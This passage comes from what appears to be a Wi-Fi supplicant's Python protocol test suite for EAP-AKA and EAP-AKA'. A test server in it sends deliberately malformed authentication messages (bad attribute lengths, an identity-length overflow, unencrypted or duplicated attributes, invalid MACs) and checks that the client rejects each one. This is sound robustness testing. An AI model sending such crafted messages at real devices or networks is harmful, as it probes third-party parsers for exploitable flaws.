0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with mismatching Checkcode value")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with Checkcode claimin identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RAND length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RAND, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTN length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTN, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_PADDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PADDING, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NONCE_MT length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_MT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_MAC length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_MAC, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NOTIFICATION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_IDENTITY overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IDENTITY, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_SELECTED_VERSION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NONCE_S")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_S, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_IV length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IV, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_ENCR_DATA length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTS length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CHECKCODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RESULT_IND length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RESULT_IND, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_BIDDING length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_BIDDING, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 49):
eap = "AKA AKA'" if i == 11 else "AKA"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap=eap, identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0, 15 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
"""EAP-AKA' protocol tests"""
def aka_prime_handler(ctx, req):
logger.info("aka_prime_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
dev[0].note("Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA_PRIME)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
dev[0].note("Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with empty AT_KDF_INPUT")
dev[0].note("Challenge with empty AT_KDF_INPUT")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with AT_KDF_INPUT")
dev[0].note("Test: Challenge with AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with duplicated KDF")
dev[0].note("Challenge with duplicated KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with incorrect KDF selected")
dev[0].note("Challenge with incorrect KDF selected")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF not duplicated")
dev[0].note("Challenge with selected KDF not duplicated")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
dev[0].note("Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple unsupported KDF proposals")
dev[0].note("Challenge with multiple unsupported KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
dev[0].note("Challenge with multiple KDF proposals (preparation)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
dev[0].note("Challenge with invalid MAC, RAND, AUTN values)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - AMF separation bit not set)")
dev[0].note("Challenge - AMF separation bit not set)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 9, 10,
0x2fda8ef7, 0xbba518cc)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Invalid MAC")
dev[0].note("Challenge - Invalid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Valid MAC")
dev[0].note("Challenge - Valid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
